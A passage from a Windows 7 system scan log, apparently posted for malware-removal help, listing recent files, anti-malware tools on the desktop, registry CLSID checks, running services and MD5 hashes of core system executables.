[2014/11/08 13:05:25 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/11/08 13:05:25 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/11/08 13:02:12 | 2064,076,799 | -HS- | M] () -- C:\hiberfil.sys
[2014/11/08 13:01:05 | 000,000,035 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2014/11/08 13:00:58 | 002,115,584 | ---- | M] (Farbar) -- C:\Users\Ryan\Desktop\FRST64.exe
[2014/11/07 18:24:40 | 000,131,800 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/11/07 18:23:43 | 000,096,472 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/11/07 18:13:17 | 014,439,144 | ---- | M] (Malwarebytes Corp.) -- C:\Users\Ryan\Desktop\mbar-1.08.0.1001.exe
[2014/11/07 15:57:55 | 000,186,568 | ---- | M] (ESET) -- C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
[2014/11/07 15:57:05 | 004,184,008 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\Ryan\Desktop\tdsskiller.exe
[2014/11/05 17:45:56 | 001,221,674 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/11/05 17:45:56 | 000,311,622 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/11/05 17:45:56 | 000,006,214 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/11/03 21:28:40 | 000,002,159 | ---- | M] () -- C:\Users\Ryan\AppData\Local\recently-used.xbel
[2014/11/03 18:26:43 | 001,706,359 | ---- | M] (Thisisu) -- C:\Users\Ryan\Desktop\JRT.exe
[2014/11/03 18:20:50 | 001,375,089 | ---- | M] () -- C:\Users\Ryan\Desktop\AdwCleaner.exe
[2014/11/03 18:14:27 | 000,034,808 | ---- | M] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2014/11/03 18:13:30 | 014,670,424 | ---- | M] () -- C:\Users\Ryan\Desktop\RogueKiller.exe
[2014/11/03 15:08:54 | 005,591,672 | R--- | M] (Swearware) -- C:\Users\Ryan\Desktop\ComboFix.exe
[2014/11/02 22:52:57 | 000,000,512 | ---- | M] () -- C:\Users\Ryan\Desktop\MBR.dat
[2014/11/02 22:26:22 | 005,192,704 | ---- | M] (AVAST Software) -- C:\Users\Ryan\Desktop\aswMBR.exe
[2014/10/30 00:30:50 | 000,000,207 | ---- | M] () -- C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
[2014/10/30 00:27:54 | 000,002,246 | ---- | M] () -- C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
[2014/10/29 15:49:18 | 000,001,113 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/10/15 15:38:30 | 000,098,216 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/10/15 15:38:28 | 000,272,808 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/10/15 15:38:28 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/10/15 15:38:28 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/10/15 15:27:04 | 000,342,240 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/10/09 21:05:59 | 000,276,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/09 21:05:42 | 000,507,392 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
========== Files Created - No Company Name ==========
[2014/11/03 21:28:40 | 000,002,159 | ---- | C] () -- C:\Users\Ryan\AppData\Local\recently-used.xbel
[2014/11/03 18:20:39 | 001,375,089 | ---- | C] () -- C:\Users\Ryan\Desktop\AdwCleaner.exe
[2014/11/03 18:14:27 | 000,034,808 | ---- | C] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2014/11/03 18:13:29 | 014,670,424 | ---- | C] () -- C:\Users\Ryan\Desktop\RogueKiller.exe
[2014/11/03 15:11:20 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2014/11/03 15:11:20 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2014/11/03 15:11:20 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2014/11/03 15:11:20 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2014/11/03 15:11:20 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2014/11/02 22:52:57 | 000,000,512 | ---- | C] () -- C:\Users\Ryan\Desktop\MBR.dat
[2014/10/30 00:30:50 | 000,000,207 | ---- | C] () -- C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
[2014/10/30 00:27:54 | 000,002,246 | ---- | C] () -- C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
[2013/06/28 06:08:46 | 000,094,208 | ---- | C] () -- C:\Windows\SysWow64\ssdevm.dll
========== ZeroAccess Check ==========
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 21:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 20:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
========== Custom Scans ==========
========== Base Services ==========
SRV:64bit: - [2009/07/13 20:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:64bit: - [2013/02/27 00:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:64bit: - [2009/07/13 20:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:64bit: - [2010/11/20 22:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:64bit: - [2010/11/20 22:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:64bit: - [2009/07/13 20:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/13 20:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:64bit: - [2012/07/04 17:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:64bit: - [2014/07/06 21:06:31 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2014/07/06 20:40:07 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:64bit: - [2010/11/20 22:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/20 22:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:64bit: - [2011/03/03 01:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:64bit: - [2009/07/13 20:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:64bit: - [2009/07/13 20:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/13 20:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:64bit: - [2009/07/13 20:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:64bit: - [2010/11/20 22:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2009/07/13 20:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:64bit: - [2009/07/13 20:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:64bit: - [2009/07/13 20:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:64bit: - [2009/07/13 20:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/13 20:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:64bit: - [2012/10/03 12:44:21 | 000,303,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:64bit: - [2009/07/13 20:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:64bit: - [2011/05/24 06:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:64bit: - [2012/02/11 01:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:64bit: - [2009/07/13 20:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:64bit: - [2010/11/20 22:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:64bit: - [2010/11/20 22:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:64bit: - [2009/07/13 20:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:64bit: - [2010/11/20 22:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:64bit: - [2010/11/20 22:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/20 22:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:64bit: - [2010/11/20 22:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:64bit: - [2010/11/20 22:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/20 22:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:64bit: - [2009/07/13 20:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:64bit: - [2012/05/01 00:40:20 | 000,209,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:64bit: - [2010/11/20 22:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:64bit: - [2014/07/06 21:06:30 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:64bit: - [2014/07/06 21:06:30 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2010/11/20 22:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/11/20 22:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:64bit: - [2010/11/20 22:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:64bit: - [2010/11/20 22:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:64bit: - [2010/11/20 22:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/20 22:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:64bit: - [2009/07/13 20:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:64bit: - [2014/05/14 11:23:46 | 002,477,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:64bit: - [2010/11/20 22:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:64bit: - [2009/07/13 20:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:64bit: - [2010/11/20 22:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)
< %SYSTEMDRIVE%\*.exe >
< MD5 for: EXPLORER.EXE >
[2011/02/26 00:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\erdnt\cache86\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe
[2011/02/26 01:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe
[2010/11/20 22:24:25 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe
[2010/11/20 22:24:11 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe
< MD5 for: SERVICES >
[2009/06/10 16:00:26 | 000,017,463 | ---- | M] () MD5=D9E1A01B480D961B7CF0509D597A92D6 -- C:\Windows\winsxs\amd64_microsoft-windows-w..nfrastructure-other_31bf3856ad364e35_6.1.7600.16385_none_6079f415110c0210\services
< MD5 for: SERVICES.EXE >
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\erdnt\cache64\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe
< MD5 for: SERVICES.EXE.MUI >
[2011/04/12 03:17:17 | 000,017,408 | ---- | M] (Microsoft Corporation) MD5=6507BF0DC2D1F5F32493C288EAA59277 -- C:\Windows\SysNative\en-US\services.exe.mui
[2011/04/12 03:17:17 | 000,017,408 | ---- | M] (Microsoft Corporation) MD5=6507BF0DC2D1F5F32493C288EAA59277 -- C:\Windows\winsxs\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5f238be3fa63468\services.exe.mui
< MD5 for: SERVICES.LNK >
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
< MD5 for: SERVICES.MOF >
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\SysNative\wbem\services.mof
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.mof
< MD5 for: SERVICES.MSC >
[2011/04/12 03:17:16 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\en-US\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\services.msc
[2011/04/12 03:17:18 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\en-US\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\services.msc
[2011/04/12 03:17:16 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_003408aa160fce5b\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_2b58d44b5f6beb8a\services.msc
[2011/04/12 03:17:18 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a4156d265db25d25\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_cf3a38c7a70e7a54\services.msc
< MD5 for: SERVICES.PTXML >
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\SysNative\wdi\perftrack\Services.ptxml
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\Services.ptxml
< MD5 for: SVCHOST.EXE >
[2009/07/13 20:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe
[2011/03/01 03:10:51 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=635455A95EB8EC47AC72142E501465ED -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.21671_none_14271b75353e4391\svchost.exe
[2011/03/01 03:07:49 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=6F68F63794097E54F36474ED4384B759 -- C:\Windows\erdnt\cache64\svchost.exe
[2011/03/01 03:07:49 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=6F68F63794097E54F36474ED4384B759 -- C:\Windows\SysNative\svchost.exe
[2011/03/01 03:07:49 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=6F68F63794097E54F36474ED4384B759 -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.17568_none_13af509c1c123937\svchost.exe
[2011/03/01 03:07:49 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=A91A288C91F9D9F1CFA4FAA9893C4D55 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.21671_none_b8087ff17ce0d25b\svchost.exe
[2014/10/01 10:09:16 | 000,761,656 | ---- | M] (MalwareBytes) MD5=C0AFB3C7E6C7CA3F6E42FF242BBBCB1F -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2009/07/13 20:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_11b04b481efec48c\svchost.exe
[2011/03/01 03:05:31 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=ECDB182F885292145826C58252B53000 -- C:\Windows\erdnt\cache86\svchost.exe
[2011/03/01 03:05:31 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=ECDB182F885292145826C58252B53000 -- C:\Windows\SysWOW64\svchost.exe
[2011/03/01 03:05:31 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=ECDB182F885292145826C58252B53000 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.17568_none_b790b51863b4c801\svchost.exe
< MD5 for: USERINIT.EXE >
[2010/11/20 22:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\erdnt\cache86\userinit.exe
[2010/11/20 22:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\SysWOW64\userinit.exe
[2010/11/20 22:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_de3024012ff21116\userinit.exe
[2010/11/20 22:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\erdnt\cache64\userinit.exe
[2010/11/20 22:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\SysNative\userinit.exe
[2010/11/20 22:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_3a4ebf84e84f824c\userinit.exe
< MD5 for: WINLOGON.EXE >
[2010/11/20 22:24:29 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
